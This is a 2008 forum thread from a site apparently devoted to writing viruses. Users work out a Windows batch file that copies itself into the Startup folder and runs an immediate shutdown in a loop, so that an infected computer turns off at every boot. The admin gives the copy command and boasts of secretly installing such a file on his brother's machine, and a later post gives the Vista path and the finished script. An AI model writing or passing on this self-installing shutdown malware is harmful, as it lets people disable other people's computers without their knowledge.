Virus Coding
Would you like to react to this message? Create an account in a few clicks or log in to continue.

.bat that can copy to Startup?

4 posters

Go down

.bat that can copy to Startup? Empty .bat that can copy to Startup?

Post  Slade Mon Nov 17, 2008 7:19 pm

Is there a batch command that allows it to copy a command to the system Startup? I have a code, see...
Code:
shutdown -s -t 00
that allows me to turn off the computer at will (Twisted Evil), and if I can install it into the startup, I can render the entire system inoperable, unless they have safe mode!

I believe it can be done. I remember Butcher's anti-cheater virus that deletes Halo trial and prevents it from reinstalling (the one that looks like an aimbot tongue).
Slade
Slade
High Member
High Member

Number of posts : 30
Location : *generic witty comment, e.g. "behind you"*
What I do : Sit at my computer, typing what I do.
Registration date : 2008-11-17

Back to top Go down

.bat that can copy to Startup? Empty Re: .bat that can copy to Startup?

Post  Butcher Tue Nov 18, 2008 11:14 am

yep it can be done. Just put it,
Code:
copy "(the name of the file).bat" "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
lol ive made this b4, its cool. It works, because i put it on my brothers computer since he broke something of mine.
that copies it into startup!! On xp only i am pretty sure, for vista you need to fix the folders. Since i dont have vista, i dont know how. Mad
Butcher
Butcher
Admin
Admin

Number of posts : 71
Age : 39
Location : On my computer, DUH how would i be writing this... no really 90% of my day is on my computer
What I do : Sit on pc. I also like going to a server to fuck it up with hacking until i get bored again.
Registration date : 2008-11-10

https://viruscoding.forumotion.com

Back to top Go down

.bat that can copy to Startup? Empty Re: .bat that can copy to Startup?

Post  bobbel Sat Nov 29, 2008 2:01 pm

for vista "C:\Users\Bob\AppData\Roaming\Microsoft\Windows\Start Menu\Programs", for "Bob" use all users
bobbel
bobbel
Moderator
Moderator

Number of posts : 42
Age : 29
Location : Under my bed, lagging your internet connection with my 50 g downloads
What I do : H4x0rz
Registration date : 2008-11-25

http://www.b0bbel.nl

Back to top Go down

.bat that can copy to Startup? Empty Re: .bat that can copy to Startup?

Post  Lord Sla Tue Dec 23, 2008 11:31 am

Thanks. That's easier than I expected Razz

Here's the "finished" code. (Not sure if it works; I'm sure as hell not gonna run it X3)
Code:
@echo off
:ownage
copy "ThisIsSPARTA.bat" "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
shutdown -s -t 00
goto :ownage

Lord Sla
Guest


Back to top Go down

.bat that can copy to Startup? Empty Re: .bat that can copy to Startup?

Post  Slade Tue Dec 23, 2008 11:39 am

^^^ Forgot to login when I posted that silent
Slade
Slade
High Member
High Member

Number of posts : 30
Location : *generic witty comment, e.g. "behind you"*
What I do : Sit at my computer, typing what I do.
Registration date : 2008-11-17

Back to top Go down

.bat that can copy to Startup? Empty Re: .bat that can copy to Startup?

Post  Butcher Fri Dec 26, 2008 7:48 pm

when you put goto dont put the :
Butcher
Butcher
Admin
Admin

Number of posts : 71
Age : 39
Location : On my computer, DUH how would i be writing this... no really 90% of my day is on my computer
What I do : Sit on pc. I also like going to a server to fuck it up with hacking until i get bored again.
Registration date : 2008-11-10

https://viruscoding.forumotion.com

Back to top Go down

.bat that can copy to Startup? Empty Re: .bat that can copy to Startup?

Post  jazy555 Fri Dec 26, 2008 11:31 pm

BUTHER UR BACK YAY GO MSN!!!!!! bounce bounce bounce afro
jazy555
jazy555
Admin
Admin

Number of posts : 35
Age : 30
Location : At school making an excuse for my homework
What I do : im a hacker.... in training :P and butchers friend! B)
Registration date : 2008-11-11

Back to top Go down

.bat that can copy to Startup? Empty Re: .bat that can copy to Startup?

Post  Sponsored content


Sponsored content


Back to top Go down

Back to top


 
Permissions in this forum:
You cannot reply to topics in this forum